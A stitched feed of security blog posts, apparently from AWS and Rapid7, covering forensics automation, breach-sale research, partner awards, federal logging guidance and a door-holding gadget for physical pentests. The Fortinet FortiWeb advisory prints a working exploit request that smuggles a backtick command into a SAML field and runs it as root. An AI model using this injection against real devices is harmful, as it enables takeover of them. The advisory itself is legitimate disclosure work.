  • Automated workflow: 11 minutes
  • Manual workflow: 15 minutes

Scenario 2: EC2 instance with four 8GB volumes

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 10 minutes

Scenario 3: Four EC2 instances with one 8GB volume each

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 20 minutes

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your artifact S3 bucket. Then delete the diskForensics stack, followed by the diskForensicImageBuilder stack, and finally the diskMember stack. You must also manually delete any EBS volumes or EBS snapshots created by the pipeline, these are not deleted automatically. You must also manually delete the AMI and images that are created and published by Image Builder.

Considerations

This solution covers EBS volume storage as the target for forensic disk capture. If your instances use Amazon EC2 Instance Stores in your environment, then you cannot snapshot and copy those volumes, because that data is not included in an EC2 snapshot operation. Instead, you should consider running the commands that are included in collector.sh script with AWS Systems Manager. The collector.sh script is included in the Image Builder recipe and uses dc3dd to stream a copy of the volume to Amazon S3.

Conclusion

Having this solution in place across your AWS accounts will enable fast response times to security events, as it helps ensure that forensic artifacts are collected and stored as quickly as possible. Download the .zip file for the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows. For the talks describing this solution, see the video of SEC306 from Re:Invent 2020 and the AWS Online Tech Talk AWS Digital Forensics Automation at Goldman Sachs.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Matt Duda

Matt is a Senior Cloud Security Architect with AWS Professional Services. He has an extensive background in Cyber Security in the Financial Services Sector. He is obsessed with helping customers improve their ability to prevent, prepare, and respond to potential security events in AWS and utilizing automation wherever possible.

Contributor

Special thanks to Logan Bair who made significant contributions to this post.

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Post Syndicated from Paul Prudhomme original https://blog.rapid7.com/2021/08/24/cybercriminals-selling-access-to-compromised-networks-3-surprising-research-findings/

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Cybercriminals are innovative, always finding ways to adapt to new circumstances and opportunities. The proof of this can be seen in the rise of a certain variety of activity on the dark web: the sale of access to compromised networks.

This type of dark web activity has existed for decades, but it matured and began to truly thrive amid the COVID-19 global pandemic. The worldwide shift to a remote workforce gave cybercriminals more attack surface to exploit, which fueled sales on underground criminal websites, where buyers and sellers transfer network access to compromised enterprises and organizations to turn a profit.

Having witnessed this sharp rise in breach sales in the cybercriminal ecosystem, IntSights, a Rapid7 company, decided to analyze why and how criminals sell their network access, with an eye toward understanding how to prevent these network compromise events from happening in the first place.

We have compiled our network compromise research, as well as our prevention and mitigation best practices, in the brand-new white paper “Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums.”

During the process of researching and analyzing, we came across three surprising findings we thought worth highlighting. For a deeper dive, we recommend reading the full white paper, but let’s take a quick look at these discoveries here.

1. The massive gap between average and median breach sales prices

As part of our research, we took a close look at the pricing characteristics of breach sales in the criminal-to-criminal marketplace. Unsurprisingly, pricing varied considerably from one sale to another. A number of factors can influence pricing, including everything from the level of access provided to the value of the victim as a source of criminal revenue.

That said, we found an unexpectedly significant discrepancy between the average price and the median price across the 40 sales we analyzed. The average price came out to approximately $9,640 USD, while the median price was $3,000 USD.

In part, this gap can be attributed to a few unusually high prices among the most expensive offerings. The lowest price in our dataset was $240 USD for access to a healthcare organization in Colombia, but healthcare pricing tends to trend lower than other industries, with a median price of $700 in this sample. On the other end of the spectrum, the highest price was for a telecommunications service provider that came in at about $95,000 USD worth of Bitcoin.

Because of this discrepancy, IntSights researchers view the average price of $9,640 USD as a better indicator of the higher end of the price range, while the median price is more representative of typical pricing for these sales — $3,000 USD was also the single most common price. Nonetheless, it was fascinating to discover this difference and dig into the reasons behind it.

2. The numerical dominance of tech and telecoms victims

While the sales of network access are a cross-industry phenomenon, technology and telecommunications companies are the most common victims. Not only are they frequent targets, but their compromised access also commands some of the highest prices on the market.

In our sample, tech and telecoms represented 10 of the 46 victims, or 22% of those affected by industry. Out of the 10 most expensive offerings we analyzed, four were for tech and telecommunications organizations, and there were only two that had prices under $10,000 USD. A telecommunications service provider located in an unspecified Asian country also had the single most expensive offering in this sample at approximately $95,000 USD.

After investigating the reasoning behind this numerical dominance, IntSights researchers believe that the high value and high number of tech and telecommunications companies as breach victims stem from their usefulness in enabling further attacks on other targets. For example, a cybercriminal who gains access to a mobile service provider could conduct SIM swapping attacks on digital banking customers who use two-factor authentication via SMS.

These pricing standards were surprisingly expensive compared to other industries, but for good reason: the investment may cost more upfront but prove more lucrative in the long run.

3. The low proportion of retail and hospitality victims

As previously mentioned, we broke down the sales of network access based on the industries affected, and to our surprise, only 6.5% of victims were in retail and hospitality. This seemed odd, considering the popularity of the industry as a target for cybercrime. Think of all the headlines in the news about large retail companies falling victim to a breach that exposed millions of customer credentials.

We explored the reasoning behind this low proportion of victims in the space and came to a few conclusions. For example, we theorized that the main customers for these network access sales are ransomware operators, not payment card data collectors. Payment card data collection is likely a more optimal way to monetize access to a retail or hospitality business, whereas putting ransomware on a retail and hospitality network would actually “kill the goose that lays the golden eggs.”

We also found that the second-most expensive offering in this sample was for access to an organization supporting retail and hospitality businesses. The victim was a third party managing customer loyalty and rewards programs, and the seller highlighted how a buyer could monetize this indirect access to its retail and hospitality customer base. This victim may have been more valuable because, among other things, loyalty and rewards programs are softer targets with weaker security than credit cards and bank accounts; thus, they’re easier to defraud.

Learn more about compromised network access sales

Curious to learn more about the how and why of cybercriminals selling compromised network access? Read our white paper, Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums, for the full story behind this research and how it can inform your security efforts.

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/23/the-lost-bots-bonus-episode-velociraptor-contributor-competition/

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Welcome back for a special bonus edition of The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this extra installment, Jeffrey chats with Mike Cohen, Digital Paleontologist for Velociraptor, an open source endpoint visibility tool that Rapid7 acquired earlier this year.

Mike fills us in on Velociraptor’s very first Contributor Competition, a friendly hackathon-style event that invites entrants to get their hands dirty and build the best extension to the Velociraptor platform that they can. Check out the episode to hear more about the competition, who’s judging, what they’re looking for, and what’s coming your way if you win — spoiler: there’s a cool $5,000 waiting for you if you nab the No. 1 spot, plus a range of other monetary and merchandise prizes. Jeffrey himself even plans to put his name in the ring!



[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Stay tuned for future episodes of The Lost Bots! And don’t forget to start working on your entry for the 2021 Velociraptor Contributor Competition.

Rapid7 Announces Partner of the Year Awards 2021 Winners

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/19/rapid7-announces-partner-of-the-year-awards-2021-winners/

Rapid7 Announces Partner of the Year Awards 2021 Winners

Over the past year and more, we’ve lived through the most extraordinary, turbulent, and challenging times we’ll likely experience in our lifetime. Yet through all the uncertainty, our partners have continued to show determination, drive, and commitment, performing at an exceptional level.

With this said, it’s with immense pleasure that we announce today the winners of the Rapid7 Partner of the Year Awards 2021. All our category winners have achieved exceptional growth, demonstrating dedication and collaboration to the Rapid7 Partner Program throughout the year.

We’re very proud to share our complete list of winners. Please join us in congratulating them all.

International Awards

EMEA Partner of the Year: Softcat Plc

APAC Partner of the Year: Intalock Technologies Pty Ltd

International Emerging Partner of the Year: Caretower Ltd

International Best Customer Retention Award: Saepio Solutions Ltd

APAC Vulnerability Management Partner of the Year: RIoT Solutions

EMEA Vulnerability Management Partner of the Year: Orange Cyberdefense Sweden

APAC Detection & Response Partner of the Year: The Missing Link

EMEA Detection & Response Partner of the Year: Saepio Solutions Ltd

APAC MSSP Partner of the Year: Triskele Labs

EMEA MSSP Partner of the Year: Charterhouse Voice and Data

“We are proud of the relationship we have built with Rapid7 over the last two years, and they have become one of our key focus partners. To be awarded EMEA MSSP Partner of the Year in such a short space of time is a testament to our technical team and our commitment to Rapid7. As an integral component in our state of the Security Operations Centre, we only see this relationship going from strength to strength.”

North America Awards

Rapid 7 North America Partner of the Year: SHI International Corporation

“Thank you so much. With Rapid7 being a strategic security partner to SHI, we are excited to be receiving this award. I feel that this highlights the excellent relationship that we have, as well as some really great engagement we’ve seen between our sales teams.  Security is an extremely important industry to SHI and our mutual customers. I am confident we will continue to see success when positioning Rapid7 solutions.”

– Joseph Lentine, Director – Strategic Software Partners, Security

North America Emerging Partner of the Year: GDT

North America Best Customer Retention Award: Optiv

North America Vulnerability Management Partner of the Year: GuidePoint Security

North America Detection & Response Partner of the Year: Sayers

“Being selected for this award is a special honor for Sayers. Ransomware preparedness is a cornerstone of the Sayers Cybersecurity Services portfolio.  We couldn’t be more impressed with the professionalism and cutting-edge technology Rapid7 brings to the market.  It was an easy decision to partner with Rapid7 for our Sayers Managed Detection & Response service offering.”

Joel Grace, Sr. VP of Client Services

North America MSSP Partner of the Year: Edge Communications

“Edge Communications is honored to be named the Rapid7 North America MSSP Partner of the Year for 2020.

“Edge is proud of the strong collaborative relationship that we have developed with Rapid7, a cybersecurity industry leader. Edge delivers one the best Managed Security solutions available in the marketplace, due in part to utilizing Rapid 7 products which we believe exceed the best in class designation. On behalf of the entire Edge team, thank you Rapid 7 for your support, dedication, and partnership.”

– Frank Pallone, VP Information Security

Congratulations again to all our winners!

More about our partner program

The Rapid7 PACT Program is built to inspire our partners to grow with us and achieve mutual success through accountability, consistency, and transparency. By participating in the program, partners can offer powerful, industry-leading solutions to our joint customers, resulting in mutual success for all.

If you’re interested in becoming a Rapid7 partner, you can learn more here.

Fortinet FortiWeb OS Command Injection

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/

Fortinet FortiWeb OS Command Injection

An OS command injection vulnerability in FortiWeb’s management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and has a CVSSv3 base score of 8.7. This vulnerability appears to be related to CVE-2021-22123, which was addressed in FG-IR-20-120.

Product Description

Fortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at the vendor’s website.

Credit

This issue was discovered by researcher William Vu of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:

int move_metafile(char *path,char *name)
{
int iVar1;
char buf [512];
int nret;
snprintf(buf,0x200,"%s/%s","/data/etc/saml/shibboleth/service_providers",name);
iVar1 = access(buf,0);
if (iVar1 != 0) {
snprintf(buf,0x200,"mkdir %s/%s","/data/etc/saml/shibboleth/service_providers",name);
iVar1 = system(buf);
if (iVar1 != 0) {
return iVar1;
}
}
snprintf(buf,0x200,"cp %s %s/%s/%s.%s",path,"/data/etc/saml/shibboleth/service_providers",name,
"Metadata",&DAT_00212758);
iVar1 = system(buf);
return iVar1;
}

The HTTP POST request and response below demonstrates an example exploit of this vulnerability:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"
`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"
test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"
/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"
8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"
30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"
/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"
/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"
disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test">
<md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<md:KeyDescriptor use="signing">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:KeyDescriptor use="encryption">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
<md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/>
</md:IDPSSODescriptor>
</md:EntityDescriptor>
-----------------------------94351131111899571381631694412--
HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close
Content-Type: application/json
{"errcode": "-651"}

Note the smuggled ‘touch’ command is concatenated in the mkdir shell command:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

Finally, the results of the ‘touch’ command can be seen on the local command line of the FortiWeb device:

/# ls -l /tmp/vulnerable
-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable
/#

Impact

An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, Rapid7 researchers were only able to identify less than three hundred total of these devices that appear to be exposing their management interfaces to the general internet.

Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as CVE-2020-29015.

Remediation

In the absence of a patch, users are advised to disable the FortiWeb device’s management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[The Lost Bots] Episode 3: Stories From the SOC

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/16/the-lost-bots-episode-3-stories-from-the-soc/

[The Lost Bots] Episode 3: Stories From the SOC

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this third episode, Jeffrey is joined by Stephen Davis, a Technical Lead and Customer Advisor on Rapid7’s Managed Detection and Response team. Stephen shares a story about a phishing attack on an organization, possibly by an advanced persistent threat (APT) — insert spooky “dun dun dun” sound effect — through a malicious Excel document. Watch below to hear about how our MDR team caught this attack, lessons learned, and tips for how teams can stay ahead of these types of threats in their environment.



[The Lost Bots] Episode 3: Stories From the SOC

Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles deception technology — what it is, how you can use it, and why it matters.

How US federal agencies can use AWS to improve logging and log retention

Post Syndicated from Derek Doerr original https://aws.amazon.com/blogs/security/how-us-federal-agencies-can-use-aws-to-improve-logging-and-log-retention/

This post is part of a series about how Amazon Web Services (AWS) can help your US federal agency meet the requirements of the President’s Executive Order on Improving the Nation’s Cybersecurity. You will learn how you can use AWS information security practices to help meet the requirement to improve logging and log retention practices in your AWS environment.

Improving the security and operational readiness of applications relies on improving the observability of the applications and the infrastructure on which they operate. For our customers, this translates to questions of how to gather the right telemetry data, how to securely store it over its lifecycle, and how to analyze the data in order to make it actionable. These questions take on more importance as our federal customers seek to improve their collection and management of log data in all their IT environments, including their AWS environments, as mandated by the executive order.

Given the interest in the technologies used to support logging and log retention, we’d like to share our perspective. This starts with an overview of logging concepts in AWS, including log storage and management, and then proceeds to how to gain actionable insights from that logging data. This post will address how to improve logging and log retention practices consistent with the Security and Operational Excellence pillars of the AWS Well-Architected Framework.

Log actions and activity within your AWS account

AWS provides you with extensive logging capabilities to provide visibility into actions and activity within your AWS account. A security best practice is to establish a wide range of detection mechanisms across all of your AWS accounts. Starting with services such as AWS CloudTrail, AWS Config, Amazon CloudWatch, Amazon GuardDuty, and AWS Security Hub provides a foundation upon which you can base detective controls, remediation actions, and forensics data to support incident response. Here is more detail on how these services can help you gain more security insights into your AWS workloads:

  • AWS CloudTrail provides event history for all of your AWS account activity, including API-level actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services. You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event occurred, and other details. If your agency uses AWS Organizations, you can automate this process for all of the accounts in the organization.
  • CloudTrail logs can be delivered from all of your accounts into a centralized account. This places all logs in a tightly controlled, central location, making it easier to both protect them as well as to store and analyze them. As with AWS CloudTrail, you can automate this process for all of the accounts in the organization using AWS Organizations.  CloudTrail can also be configured to emit metrical data into the CloudWatch monitoring service, giving near real-time insights into the usage of various services.
  • CloudTrail log file integrity validation produces and cyptographically signs a digest file that contains references and hashes for every CloudTrail file that was delivered in that hour. This makes it computationally infeasible to modify, delete or forge CloudTrail log files without detection. Validated log files are invaluable in security and forensic investigations. For example, a validated log file enables you to assert positively that the log file itself has not changed, or that particular user credentials performed specific API activity.
  • AWS Config monitors and records your AWS resource configurations and allows you to automate the evaluation of recorded configurations against desired configurations. For example, you can use AWS Config to verify that resources are encrypted, multi-factor authentication (MFA) is enabled, and logging is turned on, and you can use AWS Config rules to identify noncompliant resources. Additionally, you can review changes in configurations and relationships between AWS resources and dive into detailed resource configuration histories, helping you to determine when compliance status changed and the reason for the change.
  • Amazon GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior to protect your AWS accounts and workloads. Amazon GuardDuty analyzes and processes the following data sources: VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail Amazon Simple Storage Service (Amazon S3) data event logs, and DNS logs. It uses threat intelligence feeds, such as lists of malicious IP addresses and domains, and machine learning to identify potential threats within your AWS environment.
  • AWS Security Hub provides a single place that aggregates, organizes, and prioritizes your security alerts, or findings, from multiple AWS services and optional third-party products to give you a comprehensive view of security alerts and compliance status.

You should be aware that most AWS services do not charge you for enabling logging (for example, AWS WAF) but the storage of logs will incur ongoing costs. Always consult the AWS service’s pricing page to understand cost impacts. Related services such as Amazon Kinesis Data Firehose (used to stream data to storage services), and Amazon Simple Storage Service (Amazon S3), used to store log data, will incur charges.

Turn on service-specific logging as desired

After you have the foundational logging services enabled and configured, next turn your attention to service-specific logging. Many AWS services produce service-specific logs that include additional information. These services can be configured to record and send out information that is necessary to understand their internal state, including application, workload, user activity, dependency, and transaction telemetry. Here’s a sampling of key services with service-specific logging features:

  • Amazon CloudWatch provides you with data and actionable insights to monitor your applications, respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications, and services that run on AWS and on-premises servers. You can gain additional operational insights from your AWS compute instances (Amazon Elastic Compute Cloud, or EC2) as well as on-premises servers using the CloudWatch agent. Additionally, you can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.
  • Amazon CloudWatch Logs is a component of Amazon CloudWatch which you can use to monitor, store, and access your log files from Amazon Elastic Compute Cloud (Amazon EC2) instances, AWS CloudTrail, Route 53, and other sources. CloudWatch Logs enables you to centralize the logs from all of your systems, applications, and AWS services that you use, in a single, highly scalable service. You can then easily view them, search them for specific error codes or patterns, filter them based on specific fields, or archive them securely for future analysis. CloudWatch Logs enables you to see all of your logs, regardless of their source, as a single and consistent flow of events ordered by time, and you can query them and sort them based on other dimensions, group them by specific fields, create custom computations with a powerful query language, and visualize log data in dashboards.
  • Traffic Mirroring allows you to achieve full packet capture (as well as filtered subsets) of network traffic from an elastic network interface of EC2 instances inside your VPC. You can then send the captured traffic to out-of-band security and monitoring appliances for content inspection, threat monitoring, and troubleshooting.
  • The Elastic Load Balancing service provides access logs that capture detailed information about requests that are sent to your load balancer. Each log contains information such as the time the request was received, the client’s IP address, latencies, request paths, and server responses. The specific information logged varies by load balancer type:
  • Amazon S3 access logs record the S3 bucket and account that are being accessed, the API action, and requester information.
  • AWS Web Application Firewall (WAF) logs record web requests that are processed by AWS WAF, and indicate whether the requests matched AWS WAF rules and what actions, if any, were taken. These logs are delivered to Amazon S3 by using Amazon Kinesis Data Firehose.
  • Amazon Relational Database Service (Amazon RDS) log files can be downloaded or published to Amazon CloudWatch Logs. Log settings are specific to each database engine. Agencies use these settings to apply their desired logging configurations and chose which events are logged.  Amazon Aurora and Amazon RDS for Oracle also support a real-time logging feature called “database activity streams” which provides even more detail, and cannot be accessed or modified by database administrators.
  • Amazon Route 53 provides options for logging for both public DNS query requests as well as Route53 Resolver DNS queries:
    • Route 53 Resolver DNS query logs record DNS queries and responses that originate from your VPC, that use an inbound Resolver endpoint, that use an outbound Resolver endpoint, or that use a Route 53 Resolver DNS Firewall.
    • Route 53 DNS public query logs record queries to Route 53 for domains you have hosted with AWS, including the domain or subdomain that was requested; the date and time of the request; the DNS record type; the Route 53 edge location that responded to the DNS query; and the DNS response code.
  • Amazon Elastic Compute Cloud (Amazon EC2) instances can use the unified CloudWatch agent to collect logs and metrics from Linux, macOS, and Windows EC2 instances and publish them to the Amazon CloudWatch service.
  • Elastic Beanstalk logs can be streamed to CloudWatch Logs. You can also use the AWS Management Console to request the last 100 log entries from the web and application servers, or request a bundle of all log files that is uploaded to Amazon S3 as a ZIP file.
  • Amazon CloudFront logs record user requests for content that is cached by CloudFront.

Store and analyze log data

Now that you’ve enabled foundational and service-specific logging in your AWS accounts, that data needs to be persisted and managed throughout its lifecycle. AWS offers a variety of solutions and services to consolidate your log data and store it, secure access to it, and perform analytics.

Store log data

The primary service for storing all of this logging data is Amazon S3. Amazon S3 is ideal for this role, because it’s a highly scalable, highly resilient object storage service. AWS provides a rich set of multi-layered capabilities to secure log data that is stored in Amazon S3, including encrypting objects (log records), preventing deletion (the S3 Object Lock feature), and using lifecycle policies to transition data to lower-cost storage over time (for example, to S3 Glacier). Access to data in Amazon S3 can also be restricted through AWS Identity and Access Management (IAM) policies, AWS Organizations service control policies (SCPs), S3 bucket policies, Amazon S3 Access Points, and AWS PrivateLink interfaces. While S3 is particularly easy to use with other AWS services given its various integrations, many customers also centralize their storage and analysis of their on-premises log data, or log data from other cloud environments, on AWS using S3 and the analytic features described below.

If your AWS accounts are organized in a multi-account architecture, you can make use of the AWS Centralized Logging solution. This solution enables organizations to collect, analyze, and display CloudWatch Logs data in a single dashboard. AWS services generate log data, such as audit logs for access, configuration changes, and billing events. In addition, web servers, applications, and operating systems all generate log files in various formats. This solution uses the Amazon Elasticsearch Service (Amazon ES) and Kibana to deploy a centralized logging solution that provides a unified view of all the log events. In combination with other AWS-managed services, this solution provides you with a turnkey environment to begin logging and analyzing your AWS environment and applications.

You can also make use of services such as Amazon Kinesis Data Firehose, which you can use to transport log information to S3, Amazon ES, or any third-party service that is provided with an HTTP endpoint, such as Datadog, New Relic, or Splunk.

Finally, you can use Amazon EventBridge to route and integrate event data between AWS services and to third-party solutions such as software as a service (SaaS) providers or help desk ticketing systems. EventBridge is a serverless event bus service that allows you to connect your applications with data from a variety of sources. EventBridge delivers a stream of real-time data from your own applications, SaaS applications, and AWS services, and then routes that data to targets such as AWS Lambda.

Analyze log data and respond to incidents

As the final step in managing your log data, you can use AWS services such as Amazon Detective, Amazon ES, CloudWatch Logs Insights, and Amazon Athena to analyze your log data and gain operational insights.

  • Amazon Detective makes it easy to analyze, investigate, and quickly identify the root cause of security findings or suspicious activities. Detective automatically collects log data from your AWS resources. It then uses machine learning, statistical analysis, and graph theory to help you visualize and conduct faster and more efficient security investigations.
  • Incident Manager is a component of AWS Systems Manger which enables you to automatically take action when a critical issue is detected by an Amazon CloudWatch alarm or Amazon Eventbridge event. Incident Manager executes pre-configured response plans to engage responders via SMS and phone calls, enable chat commands and notifications using AWS Chatbot, and execute AWS Systems Manager Automation runbooks. The Incident Manager console integrates with AWS Systems Manager OpsCenter to help you track incidents and post-incident action items from a central place that also synchronizes with popular third-party incident management tools such as Jira Service Desk and ServiceNow.
  • Amazon Elasticsearch Service (Amazon ES) is a fully managed service that collects, indexes, and unifies logs and metrics across your environment to give you unprecedented visibility into your applications and infrastructure. With Amazon ES, you get the scalability, flexibility, and security you need for the most demanding log analytics workloads. You can configure a CloudWatch Logs log group to stream data it receives to your Amazon ES cluster in near real time through a CloudWatch Logs subscription.
  • CloudWatch Logs Insights enables you to interactively search and analyze your log data in CloudWatch Logs.
  • Amazon Athena is an interactive query service that you can use to analyze data in Amazon S3 by using standard SQL. Athena is serverless, so there is no infrastructure to manage, and you pay only for the queries that you run.

Conclusion

As called out in the executive order, information from network and systems logs is invaluable for both investigation and remediation services. AWS provides a broad set of services to collect an unprecedented amount of data at very low cost, optionally store it for long periods of time in tiered storage, and analyze that telemetry information from your cloud-based workloads. These insights will help you improve your organization’s security posture and operational readiness and, as a result, improve your organization’s ability to deliver on its mission.

Next steps

To learn more about how AWS can help you meet the requirements of the executive order, see the other post in this series:

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Derek Doerr

Derek is a Senior Solutions Architect with the Public Sector team at AWS. He has been working with AWS technology for over four years. Specializing in enterprise management and governance, he is passionate about helping AWS customers navigate their journeys to the cloud. In his free time, he enjoys time with family and friends, as well as scuba diving.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Post Syndicated from Ted Raffle original https://blog.rapid7.com/2021/08/13/when-one-door-opens-keep-it-open-a-new-tool-for-physical-security-testing/

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As penetration testers, we spend most of our time working with different types of networks, applications, and hardware devices. Physical security is another fun area we get to work in during physical social engineering penetration tests and red team engagements, which sometimes includes attempts to gain entry into facilities or sensitive areas within them.

Just like when we’re testing a virtual network’s defenses against intruders, pentesters need to put themselves in the mindset of attackers when testing physical security — and that means thinking creatively.

One classic method of gaining physical access is “tailgating,” where you wait for someone else to be going into or coming out of where you want to go, so you can follow them in before a door closes. To help pentesters simulate an attacker who can tailgate without suspiciously hovering around the door, we’ve come up with a neat little device to help with outward-opening doors with ferromagnetic metal frames, like steel entry doors. This tool is one more way pentesters can recreate the thought process of attackers — and help organizations outsmart them.

But first, of course, we want to caution that this is something that should only be used for legitimate purposes, when you have authorization or authority to do so. While we encourage other testers to try this out themselves and use it for customer engagements, this device is patent pending, and we request that you not manufacture, sell, or monetize it.

It’s it! What is it?

We start by placing our little door holder on the door frame, on the side of the door that opens:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

When someone opens the door, it will push the long leaf of the hinge forward:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

As the door opens further than the long leaf of the hinge, it falls back down behind the door:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

And while the person who was exiting the door is hopefully on their merry way and not looking back to see if the door will close behind them, our little device will make sure it doesn’t:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

More than one way to peel an orange

We’ve made a few versions of this using lock hasps. Another common hinge with a longer side would be your standard t-hinge. This one was made with a few bar-style neodymium magnets:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

We’ve also made a miniature version using cup-style neodymium magnets:

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Important tips

Neodymium magnets can slide around a good bit on smooth surfaces. Putting some grippy tape on the back of the magnet can help keep it from sliding around or scratching paint. Electrical tape and gorilla tape have worked well.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

